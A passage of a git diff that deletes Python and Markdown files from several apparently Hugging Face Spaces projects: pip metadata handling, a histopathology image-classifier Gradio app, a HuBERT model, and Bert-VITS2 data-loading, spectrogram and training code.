EntryPoint(name=name.strip(), value=value.strip(), group=group) - - def _metadata_impl(self) -> email.message.Message: - """ - :raises NoneMetadataError: if the distribution reports `has_metadata()` - True but `get_metadata()` returns None. - """ - if isinstance(self._dist, pkg_resources.DistInfoDistribution): - metadata_name = "METADATA" - else: - metadata_name = "PKG-INFO" - try: - metadata = self.read_text(metadata_name) - except FileNotFoundError: - if self.location: - displaying_path = display_path(self.location) - else: - displaying_path = repr(self.location) - logger.warning("No metadata found in %s", displaying_path) - metadata = "" - feed_parser = email.parser.FeedParser() - feed_parser.feed(metadata) - return feed_parser.close() - - def iter_dependencies(self, extras: Collection[str] = ()) -> Iterable[Requirement]: - if extras: # pkg_resources raises on invalid extras, so we sanitize. - extras = frozenset(extras).intersection(self._dist.extras) - return self._dist.requires(extras) - - def iter_provided_extras(self) -> Iterable[str]: - return self._dist.extras - - -class Environment(BaseEnvironment): - def __init__(self, ws: pkg_resources.WorkingSet) -> None: - self._ws = ws - - @classmethod - def default(cls) -> BaseEnvironment: - return cls(pkg_resources.working_set) - - @classmethod - def from_paths(cls, paths: Optional[List[str]]) -> BaseEnvironment: - return cls(pkg_resources.WorkingSet(paths)) - - def _iter_distributions(self) -> Iterator[BaseDistribution]: - for dist in self._ws: - yield Distribution(dist) - - def _search_distribution(self, name: str) -> Optional[BaseDistribution]: - """Find a distribution matching the ``name`` in the environment. - - This searches from *all* distributions available in the environment, to - match the behavior of ``pkg_resources.get_distribution()``. - """ - canonical_name = canonicalize_name(name) - for dist in self.iter_all_distributions(): - if dist.canonical_name == canonical_name: - return dist - return None - - def get_distribution(self, name: str) -> Optional[BaseDistribution]: - # Search the distribution by looking through the working set. - dist = self._search_distribution(name) - if dist: - return dist - - # If distribution could not be found, call working_set.require to - # update the working set, and try to find the distribution again. - # This might happen for e.g. when you install a package twice, once - # using setup.py develop and again using setup.py install. Now when - # running pip uninstall twice, the package gets removed from the - # working set in the first uninstall, so we have to populate the - # working set again so that pip knows about it and the packages gets - # picked up and is successfully uninstalled the second time too. - try: - # We didn't pass in any version specifiers, so this can never - # raise pkg_resources.VersionConflict. - self._ws.require(name) - except pkg_resources.DistributionNotFound: - return None - return self._search_distribution(name) diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/_macos_compat.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/_macos_compat.py deleted file mode 100644 index 17769e9154bd9cc3f3c00dc10718e4377828cb5e..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/setuptools/_distutils/_macos_compat.py +++ /dev/null @@ -1,12 +0,0 @@ -import sys -import importlib - - -def bypass_compiler_fixup(cmd, args): - return cmd - - -if sys.platform == 'darwin': - compiler_fixup = importlib.import_module('_osx_support').compiler_fixup -else: - compiler_fixup = bypass_compiler_fixup diff --git a/spaces/ThirdEyeData/Entity-Extraction/entity.md b/spaces/ThirdEyeData/Entity-Extraction/entity.md deleted file mode 100644 index 095f9aa91d93634d9c5468ac811ef30c8134cb8f..0000000000000000000000000000000000000000 --- a/spaces/ThirdEyeData/Entity-Extraction/entity.md +++ /dev/null @@ -1,22 +0,0 @@ -ENTITY CODES - -Entity Code | What does it mean? -------------- | ------------- -PERSON | People, including fictional. -NORP | Nationalities or religious or political groups. -FAC | Buildings, airports, highways, bridges, etc. -ORG | Companies, agencies, institutions, etc. -GPE | Countries, cities, states. -LOC | Non-GPE locations, mountain ranges, bodies of water. -PRODUCT | Objects, vehicles, foods, etc. (Not services.) -EVENT | Named hurricanes, battles, wars, sports events, etc. -WORK_OF_ART | Titles of books, songs, etc. -LAW | Named documents made into laws. -LANGUAGE | Any named language. -DATE | Absolute or relative dates or periods. -TIME | Times smaller than a day. -PERCENT | Percentage, including "%". -MONEY | Monetary values, including unit. -QUANTITY | Measurements, as of weight or distance. -ORDINAL | "first", "second", etc. -CARDINAL | Numerals that do not fall under another type. \ No newline at end of file diff --git a/spaces/Tirendaz/Cancer-Detection/app.py b/spaces/Tirendaz/Cancer-Detection/app.py deleted file mode 100644 index a6a8dd0d02804381ade80c5f8e67e3baa8887543..0000000000000000000000000000000000000000 --- a/spaces/Tirendaz/Cancer-Detection/app.py +++ /dev/null @@ -1,47 +0,0 @@ -import torch -from torch import nn -from torchvision import transforms -from torchvision.models import resnet50, ResNet50_Weights -import gradio as gr - -title = "Cancer Detection" -description = "Image classification with histopathologic images" -article = "

Github Repo

" - -# The model architecture -class ImageClassifier(nn.Module): - def __init__(self): - super().__init__() - self.pretrain_model = resnet50(weights=ResNet50_Weights.DEFAULT) - self.pretrain_model.eval() - for param in self.pretrain_model.parameters(): - param.requires_grad = False - self.pretrain_model.fc = nn.Sequential( - nn.Linear(self.pretrain_model.fc.in_features, 1024), - nn.ReLU(), - nn.Dropout(), - nn.Linear(1024,2) - ) - def forward(self, input): - output=self.pretrain_model(input) - return output - -model = ImageClassifier() -model.load_state_dict(torch.load('model-data_comet-torch-model.pth')) - -def predict(inp): - image_transform = transforms.Compose([ transforms.Resize(size=(224,224)), transforms.ToTensor()]) - labels = ['normal', 'cancer'] - inp = image_transform(inp).unsqueeze(dim=0) - with torch.no_grad(): - prediction = torch.nn.functional.softmax(model(inp)) - confidences = {labels[i]: float(prediction.squeeze()[i]) for i in range(len(labels))} - return confidences - -gr.Interface(fn=predict, - inputs=gr.Image(type="pil"), - outputs=gr.Label(num_top_classes=2), - title=title, - description=description, - article=article, - examples=['image-1.jpg', 'image-2.jpg']).launch() \ No newline at end of file diff --git a/spaces/Vegecken/sovits4dzl/hubert/hubert_model.py b/spaces/Vegecken/sovits4dzl/hubert/hubert_model.py deleted file mode 100644 index 7fb642d89b07ca60792debab18e3454f52d8f357..0000000000000000000000000000000000000000 --- a/spaces/Vegecken/sovits4dzl/hubert/hubert_model.py +++ /dev/null @@ -1,222 +0,0 @@ -import copy -import random -from typing import Optional, Tuple - -import torch -import torch.nn as nn -import torch.nn.functional as t_func -from torch.nn.modules.utils import consume_prefix_in_state_dict_if_present - - -class Hubert(nn.Module): - def __init__(self, num_label_embeddings: int = 100, mask: bool = True): - super().__init__() - self._mask = mask - self.feature_extractor = FeatureExtractor() - self.feature_projection = FeatureProjection() - self.positional_embedding = PositionalConvEmbedding() - self.norm = nn.LayerNorm(768) - self.dropout = nn.Dropout(0.1) - self.encoder = TransformerEncoder( - nn.TransformerEncoderLayer( - 768, 12, 3072, activation="gelu", batch_first=True - ), - 12, - ) - self.proj = nn.Linear(768, 256) - - self.masked_spec_embed = nn.Parameter(torch.FloatTensor(768).uniform_()) - self.label_embedding = nn.Embedding(num_label_embeddings, 256) - - def mask(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: - mask = None - if self.training and self._mask: - mask = _compute_mask((x.size(0), x.size(1)), 0.8, 10, x.device, 2) - x[mask] = self.masked_spec_embed.to(x.dtype) - return x, mask - - def encode( - self, x: torch.Tensor, layer: Optional[int] = None - ) -> Tuple[torch.Tensor, torch.Tensor]: - x = self.feature_extractor(x) - x = self.feature_projection(x.transpose(1, 2)) - x, mask = self.mask(x) - x = x + self.positional_embedding(x) - x = self.dropout(self.norm(x)) - x = self.encoder(x, output_layer=layer) - return x, mask - - def logits(self, x: torch.Tensor) -> torch.Tensor: - logits = torch.cosine_similarity( - x.unsqueeze(2), - self.label_embedding.weight.unsqueeze(0).unsqueeze(0), - dim=-1, - ) - return logits / 0.1 - - def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: - x, mask = self.encode(x) - x = self.proj(x) - logits = self.logits(x) - return logits, mask - - -class HubertSoft(Hubert): - def __init__(self): - super().__init__() - - @torch.inference_mode() - def units(self, wav: torch.Tensor) -> torch.Tensor: - wav = t_func.pad(wav, ((400 - 320) // 2, (400 - 320) // 2)) - x, _ = self.encode(wav) - return self.proj(x) - - -class FeatureExtractor(nn.Module): - def __init__(self): - super().__init__() - self.conv0 = nn.Conv1d(1, 512, 10, 5, bias=False) - self.norm0 = nn.GroupNorm(512, 512) - self.conv1 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv2 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv3 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv4 = nn.Conv1d(512, 512, 3, 2, bias=False) - self.conv5 = nn.Conv1d(512, 512, 2, 2, bias=False) - self.conv6 = nn.Conv1d(512, 512, 2, 2, bias=False) - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x = t_func.gelu(self.norm0(self.conv0(x))) - x = t_func.gelu(self.conv1(x)) - x = t_func.gelu(self.conv2(x)) - x = t_func.gelu(self.conv3(x)) - x = t_func.gelu(self.conv4(x)) - x = t_func.gelu(self.conv5(x)) - x = t_func.gelu(self.conv6(x)) - return x - - -class FeatureProjection(nn.Module): - def __init__(self): - super().__init__() - self.norm = nn.LayerNorm(512) - self.projection = nn.Linear(512, 768) - self.dropout = nn.Dropout(0.1) - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x = self.norm(x) - x = self.projection(x) - x = self.dropout(x) - return x - - -class PositionalConvEmbedding(nn.Module): - def __init__(self): - super().__init__() - self.conv = nn.Conv1d( - 768, - 768, - kernel_size=128, - padding=128 // 2, - groups=16, - ) - self.conv = nn.utils.weight_norm(self.conv, name="weight", dim=2) - - def forward(self, x: torch.Tensor) -> torch.Tensor: - x = self.conv(x.transpose(1, 2)) - x = t_func.gelu(x[:, :, :-1]) - return x.transpose(1, 2) - - -class TransformerEncoder(nn.Module): - def __init__( - self, encoder_layer: nn.TransformerEncoderLayer, num_layers: int - ) -> None: - super(TransformerEncoder, self).__init__() - self.layers = nn.ModuleList( - [copy.deepcopy(encoder_layer) for _ in range(num_layers)] - ) - self.num_layers = num_layers - - def forward( - self, - src: torch.Tensor, - mask: torch.Tensor = None, - src_key_padding_mask: torch.Tensor = None, - output_layer: Optional[int] = None, - ) -> torch.Tensor: - output = src - for layer in self.layers[:output_layer]: - output = layer( - output, src_mask=mask, src_key_padding_mask=src_key_padding_mask - ) - return output - - -def _compute_mask( - shape: Tuple[int, int], - mask_prob: float, - mask_length: int, - device: torch.device, - min_masks: int = 0, -) -> torch.Tensor: - batch_size, sequence_length = shape - - if mask_length < 1: - raise ValueError("`mask_length` has to be bigger than 0.") - - if mask_length > sequence_length: - raise ValueError( - f"`mask_length` has to be smaller than `sequence_length`, but got `mask_length`: {mask_length} and `sequence_length`: {sequence_length}`" - ) - - # compute number of masked spans in batch - num_masked_spans = int(mask_prob * sequence_length / mask_length + random.random()) - num_masked_spans = max(num_masked_spans, min_masks) - - # make sure num masked indices <= sequence_length - if num_masked_spans * mask_length > sequence_length: - num_masked_spans = sequence_length // mask_length - - # SpecAugment mask to fill - mask = torch.zeros((batch_size, sequence_length), device=device, dtype=torch.bool) - - # uniform distribution to sample from, make sure that offset samples are < sequence_length - uniform_dist = torch.ones( - (batch_size, sequence_length - (mask_length - 1)), device=device - ) - - # get random indices to mask - mask_indices = torch.multinomial(uniform_dist, num_masked_spans) - - # expand masked indices to masked spans - mask_indices = ( - mask_indices.unsqueeze(dim=-1) - .expand((batch_size, num_masked_spans, mask_length)) - .reshape(batch_size, num_masked_spans * mask_length) - ) - offsets = ( - torch.arange(mask_length, device=device)[None, None, :] - .expand((batch_size, num_masked_spans, mask_length)) - .reshape(batch_size, num_masked_spans * mask_length) - ) - mask_idxs = mask_indices + offsets - - # scatter indices to mask - mask = mask.scatter(1, mask_idxs, True) - - return mask - - -def hubert_soft( - path: str, -) -> HubertSoft: - r"""HuBERT-Soft from `"A Comparison of Discrete and Soft Speech Units for Improved Voice Conversion"`. - Args: - path (str): path of a pretrained model - """ - hubert = HubertSoft() - checkpoint = torch.load(path) - consume_prefix_in_state_dict_if_present(checkpoint, "module.") - hubert.load_state_dict(checkpoint) - hubert.eval() - return hubert diff --git a/spaces/Vision-CAIR/minigpt4/minigpt4/processors/base_processor.py b/spaces/Vision-CAIR/minigpt4/minigpt4/processors/base_processor.py deleted file mode 100644 index b4c9d86859270a046623661a632587f2b3136b46..0000000000000000000000000000000000000000 --- a/spaces/Vision-CAIR/minigpt4/minigpt4/processors/base_processor.py +++ /dev/null @@ -1,26 +0,0 @@ -""" - Copyright (c) 2022, salesforce.com, inc. - All rights reserved. - SPDX-License-Identifier: BSD-3-Clause - For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause -""" - -from omegaconf import OmegaConf - - -class BaseProcessor: - def __init__(self): - self.transform = lambda x: x - return - - def __call__(self, item): - return self.transform(item) - - @classmethod - def from_config(cls, cfg=None): - return cls() - - def build(self, **kwargs): - cfg = OmegaConf.create(kwargs) - - return self.from_config(cfg) diff --git a/spaces/XzJosh/Ava-Bert-VITS2/data_utils.py b/spaces/XzJosh/Ava-Bert-VITS2/data_utils.py deleted file mode 100644 index be3a29a93188c5b3386f22e5db29e5e96d78109a..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Ava-Bert-VITS2/data_utils.py +++ /dev/null @@ -1,321 +0,0 @@ -import time -import os -import random -import numpy as np -import torch -import torch.utils.data -import commons -from mel_processing import spectrogram_torch, mel_spectrogram_torch, spec_to_mel_torch -from utils import load_wav_to_torch, load_filepaths_and_text -from text import cleaned_text_to_sequence, get_bert - -"""Multi speaker version""" - - -class TextAudioSpeakerLoader(torch.utils.data.Dataset): - """ - 1) loads audio, speaker_id, text pairs - 2) normalizes text and converts them to sequences of integers - 3) computes spectrograms from audio files. - """ - - def __init__(self, audiopaths_sid_text, hparams): - self.audiopaths_sid_text = load_filepaths_and_text(audiopaths_sid_text) - self.max_wav_value = hparams.max_wav_value - self.sampling_rate = hparams.sampling_rate - self.filter_length = hparams.filter_length - self.hop_length = hparams.hop_length - self.win_length = hparams.win_length - self.sampling_rate = hparams.sampling_rate - self.spk_map = hparams.spk2id - self.hparams = hparams - - self.use_mel_spec_posterior = getattr(hparams, "use_mel_posterior_encoder", False) - if self.use_mel_spec_posterior: - self.n_mel_channels = getattr(hparams, "n_mel_channels", 80) - - self.cleaned_text = getattr(hparams, "cleaned_text", False) - - self.add_blank = hparams.add_blank - self.min_text_len = getattr(hparams, "min_text_len", 1) - self.max_text_len = getattr(hparams, "max_text_len", 300) - - random.seed(1234) - random.shuffle(self.audiopaths_sid_text) - self._filter() - - def _filter(self): - """ - Filter text & store spec lengths - """ - # Store spectrogram lengths for Bucketing - # wav_length ~= file_size / (wav_channels * Bytes per dim) = file_size / (1 * 2) - # spec_length = wav_length // hop_length - - audiopaths_sid_text_new = [] - lengths = [] - skipped = 0 - for _id, spk, language, text, phones, tone, word2ph in self.audiopaths_sid_text: - audiopath = f'{_id}' - if self.min_text_len <= len(phones) and len(phones) <= self.max_text_len: - phones = phones.split(" ") - tone = [int(i) for i in tone.split(" ")] - word2ph = [int(i) for i in word2ph.split(" ")] - audiopaths_sid_text_new.append([audiopath, spk, language, text, phones, tone, word2ph]) - lengths.append(os.path.getsize(audiopath) // (2 * self.hop_length)) - else: - skipped += 1 - print("skipped: ", skipped, ", total: ", len(self.audiopaths_sid_text)) - self.audiopaths_sid_text = audiopaths_sid_text_new - self.lengths = lengths - - def get_audio_text_speaker_pair(self, audiopath_sid_text): - # separate filename, speaker_id and text - audiopath, sid, language, text, phones, tone, word2ph = audiopath_sid_text - - bert, phones, tone, language = self.get_text(text, word2ph, phones, tone, language, audiopath) - - spec, wav = self.get_audio(audiopath) - sid = torch.LongTensor([int(self.spk_map[sid])]) - return (phones, spec, wav, sid, tone, language, bert) - - def get_audio(self, filename): - audio, sampling_rate = load_wav_to_torch(filename) - if sampling_rate != self.sampling_rate: - raise ValueError("{} {} SR doesn't match target {} SR".format( - sampling_rate, self.sampling_rate)) - audio_norm = audio / self.max_wav_value - audio_norm = audio_norm.unsqueeze(0) - spec_filename = filename.replace(".wav", ".spec.pt") - if self.use_mel_spec_posterior: - spec_filename = spec_filename.replace(".spec.pt", ".mel.pt") - try: - spec = torch.load(spec_filename) - except: - if self.use_mel_spec_posterior: - spec = mel_spectrogram_torch(audio_norm, self.filter_length, - self.n_mel_channels, self.sampling_rate, self.hop_length, - self.win_length, self.hparams.mel_fmin, self.hparams.mel_fmax, center=False) - else: - spec = spectrogram_torch(audio_norm, self.filter_length, - self.sampling_rate, self.hop_length, self.win_length, - center=False) - spec = torch.squeeze(spec, 0) - torch.save(spec, spec_filename) - return spec, audio_norm - - def get_text(self, text, word2ph, phone, tone, language_str, wav_path): - pold = phone - w2pho = [i for i in word2ph] - word2ph = [i for i in word2ph] - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - pold2 = phone - - if self.add_blank: - p1 = len(phone) - phone = commons.intersperse(phone, 0) - p2 = len(phone) - t1 = len(tone) - tone = commons.intersperse(tone, 0) - t2 = len(tone) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - bert_path = wav_path.replace(".wav", ".bert.pt") - try: - bert = torch.load(bert_path) - assert bert.shape[-1] == len(phone) - except: - bert = get_bert(text, word2ph, language_str) - torch.save(bert, bert_path) - #print(bert.shape[-1], bert_path, text, pold) - assert bert.shape[-1] == len(phone) - - assert bert.shape[-1] == len(phone), ( - bert.shape, len(phone), sum(word2ph), p1, p2, t1, t2, pold, pold2, word2ph, text, w2pho) - phone = torch.LongTensor(phone) - tone = torch.LongTensor(tone) - language = torch.LongTensor(language) - return bert, phone, tone, language - - def get_sid(self, sid): - sid = torch.LongTensor([int(sid)]) - return sid - - def __getitem__(self, index): - return self.get_audio_text_speaker_pair(self.audiopaths_sid_text[index]) - - def __len__(self): - return len(self.audiopaths_sid_text) - - -class TextAudioSpeakerCollate(): - """ Zero-pads model inputs and targets - """ - - def __init__(self, return_ids=False): - self.return_ids = return_ids - - def __call__(self, batch): - """Collate's training batch from normalized text, audio and speaker identities - PARAMS - ------ - batch: [text_normalized, spec_normalized, wav_normalized, sid] - """ - # Right zero-pad all one-hot text sequences to max input length - _, ids_sorted_decreasing = torch.sort( - torch.LongTensor([x[1].size(1) for x in batch]), - dim=0, descending=True) - - max_text_len = max([len(x[0]) for x in batch]) - max_spec_len = max([x[1].size(1) for x in batch]) - max_wav_len = max([x[2].size(1) for x in batch]) - - text_lengths = torch.LongTensor(len(batch)) - spec_lengths = torch.LongTensor(len(batch)) - wav_lengths = torch.LongTensor(len(batch)) - sid = torch.LongTensor(len(batch)) - - text_padded = torch.LongTensor(len(batch), max_text_len) - tone_padded = torch.LongTensor(len(batch), max_text_len) - language_padded = torch.LongTensor(len(batch), max_text_len) - bert_padded = torch.FloatTensor(len(batch), 1024, max_text_len) - - spec_padded = torch.FloatTensor(len(batch), batch[0][1].size(0), max_spec_len) - wav_padded = torch.FloatTensor(len(batch), 1, max_wav_len) - text_padded.zero_() - tone_padded.zero_() - language_padded.zero_() - spec_padded.zero_() - wav_padded.zero_() - bert_padded.zero_() - for i in range(len(ids_sorted_decreasing)): - row = batch[ids_sorted_decreasing[i]] - - text = row[0] - text_padded[i, :text.size(0)] = text - text_lengths[i] = text.size(0) - - spec = row[1] - spec_padded[i, :, :spec.size(1)] = spec - spec_lengths[i] = spec.size(1) - - wav = row[2] - wav_padded[i, :, :wav.size(1)] = wav - wav_lengths[i] = wav.size(1) - - sid[i] = row[3] - - tone = row[4] - tone_padded[i, :tone.size(0)] = tone - - language = row[5] - language_padded[i, :language.size(0)] = language - - bert = row[6] - bert_padded[i, :, :bert.size(1)] = bert - - return text_padded, text_lengths, spec_padded, spec_lengths, wav_padded, wav_lengths, sid, tone_padded, language_padded, bert_padded - - -class DistributedBucketSampler(torch.utils.data.distributed.DistributedSampler): - """ - Maintain similar input lengths in a batch. - Length groups are specified by boundaries. - Ex) boundaries = [b1, b2, b3] -> any batch is included either {x | b1 < length(x) <=b2} or {x | b2 < length(x) <= b3}. - - It removes samples which are not included in the boundaries. - Ex) boundaries = [b1, b2, b3] -> any x s.t. length(x) <= b1 or length(x) > b3 are discarded. - """ - - def __init__(self, dataset, batch_size, boundaries, num_replicas=None, rank=None, shuffle=True): - super().__init__(dataset, num_replicas=num_replicas, rank=rank, shuffle=shuffle) - self.lengths = dataset.lengths - self.batch_size = batch_size - self.boundaries = boundaries - - self.buckets, self.num_samples_per_bucket = self._create_buckets() - self.total_size = sum(self.num_samples_per_bucket) - self.num_samples = self.total_size // self.num_replicas - - def _create_buckets(self): - buckets = [[] for _ in range(len(self.boundaries) - 1)] - for i in range(len(self.lengths)): - length = self.lengths[i] - idx_bucket = self._bisect(length) - if idx_bucket != -1: - buckets[idx_bucket].append(i) - - for i in range(len(buckets) - 1, 0, -1): - if len(buckets[i]) == 0: - buckets.pop(i) - self.boundaries.pop(i + 1) - - num_samples_per_bucket = [] - for i in range(len(buckets)): - len_bucket = len(buckets[i]) - total_batch_size = self.num_replicas * self.batch_size - rem = (total_batch_size - (len_bucket % total_batch_size)) % total_batch_size - num_samples_per_bucket.append(len_bucket + rem) - return buckets, num_samples_per_bucket - - def __iter__(self): - # deterministically shuffle based on epoch - g = torch.Generator() - g.manual_seed(self.epoch) - - indices = [] - if self.shuffle: - for bucket in self.buckets: - indices.append(torch.randperm(len(bucket), generator=g).tolist()) - else: - for bucket in self.buckets: - indices.append(list(range(len(bucket)))) - - batches = [] - for i in range(len(self.buckets)): - bucket = self.buckets[i] - len_bucket = len(bucket) - if (len_bucket == 0): - continue - ids_bucket = indices[i] - num_samples_bucket = self.num_samples_per_bucket[i] - - # add extra samples to make it evenly divisible - rem = num_samples_bucket - len_bucket - ids_bucket = ids_bucket + ids_bucket * (rem // len_bucket) + ids_bucket[:(rem % len_bucket)] - - # subsample - ids_bucket = ids_bucket[self.rank::self.num_replicas] - - # batching - for j in range(len(ids_bucket) // self.batch_size): - batch = [bucket[idx] for idx in ids_bucket[j * self.batch_size:(j + 1) * self.batch_size]] - batches.append(batch) - - if self.shuffle: - batch_ids = torch.randperm(len(batches), generator=g).tolist() - batches = [batches[i] for i in batch_ids] - self.batches = batches - - assert len(self.batches) * self.batch_size == self.num_samples - return iter(self.batches) - - def _bisect(self, x, lo=0, hi=None): - if hi is None: - hi = len(self.boundaries) - 1 - - if hi > lo: - mid = (hi + lo) // 2 - if self.boundaries[mid] < x and x <= self.boundaries[mid + 1]: - return mid - elif x <= self.boundaries[mid]: - return self._bisect(x, lo, mid) - else: - return self._bisect(x, mid + 1, hi) - else: - return -1 - - def __len__(self): - return self.num_samples // self.batch_size diff --git a/spaces/XzJosh/Lumi-Bert-VITS2/mel_processing.py b/spaces/XzJosh/Lumi-Bert-VITS2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Lumi-Bert-VITS2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/XzJosh/otto-Bert-VITS2/train_ms.py b/spaces/XzJosh/otto-Bert-VITS2/train_ms.py deleted file mode 100644 index 5d109003d40497ea4493e7c73f47c1eb7370a81e..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/otto-Bert-VITS2/train_ms.py +++ /dev/null @@ -1,402 +0,0 @@ -import os -import json -import argparse -import itertools -import math -import torch -import shutil -from torch import nn, optim -from torch.nn import functional as F -from torch.utils.data import DataLoader -from torch.utils.tensorboard import SummaryWriter -import torch.multiprocessing as mp -import torch.distributed as dist -from torch.nn.parallel import DistributedDataParallel as DDP -from torch.cuda.amp import autocast, GradScaler -from tqdm import tqdm -import logging -logging.getLogger('numba').setLevel(logging.WARNING) -import commons -import utils -from data_utils import ( - TextAudioSpeakerLoader, - TextAudioSpeakerCollate, - DistributedBucketSampler -) -from models import ( - SynthesizerTrn, - MultiPeriodDiscriminator, - DurationDiscriminator, -) -from losses import ( - generator_loss, - discriminator_loss, - feature_loss, - kl_loss -) -from mel_processing import mel_spectrogram_torch, spec_to_mel_torch -from text.symbols import symbols - -torch.backends.cudnn.benchmark = True -torch.backends.cuda.matmul.allow_tf32 = True -torch.backends.cudnn.allow_tf32 = True -torch.set_float32_matmul_precision('medium') -global_step = 0 - - -def main(): - """Assume Single Node Multi GPUs Training Only""" - assert torch.cuda.is_available(), "CPU training is not allowed." - - n_gpus = torch.cuda.device_count() - os.environ['MASTER_ADDR'] = 'localhost' - os.environ['MASTER_PORT'] = '65280' - - hps = utils.get_hparams() - if not hps.cont: - shutil.copy('./pretrained_models/D_0.pth','./logs/OUTPUT_MODEL/D_0.pth') - shutil.copy('./pretrained_models/G_0.pth','./logs/OUTPUT_MODEL/G_0.pth') - shutil.copy('./pretrained_models/DUR_0.pth','./logs/OUTPUT_MODEL/DUR_0.pth') - mp.spawn(run, nprocs=n_gpus, args=(n_gpus, hps,)) - - -def run(rank, n_gpus, hps): - global global_step - if rank == 0: - logger = utils.get_logger(hps.model_dir) - logger.info(hps) - utils.check_git_hash(hps.model_dir) - writer = SummaryWriter(log_dir=hps.model_dir) - writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, "eval")) - - dist.init_process_group(backend= 'gloo' if os.name == 'nt' else 'nccl', init_method='env://', world_size=n_gpus, rank=rank) - torch.manual_seed(hps.train.seed) - torch.cuda.set_device(rank) - - train_dataset = TextAudioSpeakerLoader(hps.data.training_files, hps.data) - train_sampler = DistributedBucketSampler( - train_dataset, - hps.train.batch_size, - [32, 300, 400, 500, 600, 700, 800, 900, 1000], - num_replicas=n_gpus, - rank=rank, - shuffle=True) - collate_fn = TextAudioSpeakerCollate() - train_loader = DataLoader(train_dataset, num_workers=2, shuffle=False, pin_memory=True, - collate_fn=collate_fn, batch_sampler=train_sampler) - if rank == 0: - eval_dataset = TextAudioSpeakerLoader(hps.data.validation_files, hps.data) - eval_loader = DataLoader(eval_dataset, num_workers=0, shuffle=False, - batch_size=1, pin_memory=True, - drop_last=False, collate_fn=collate_fn) - if "use_noise_scaled_mas" in hps.model.keys() and hps.model.use_noise_scaled_mas == True: - print("Using noise scaled MAS for VITS2") - use_noise_scaled_mas = True - mas_noise_scale_initial = 0.01 - noise_scale_delta = 2e-6 - else: - print("Using normal MAS for VITS1") - use_noise_scaled_mas = False - mas_noise_scale_initial = 0.0 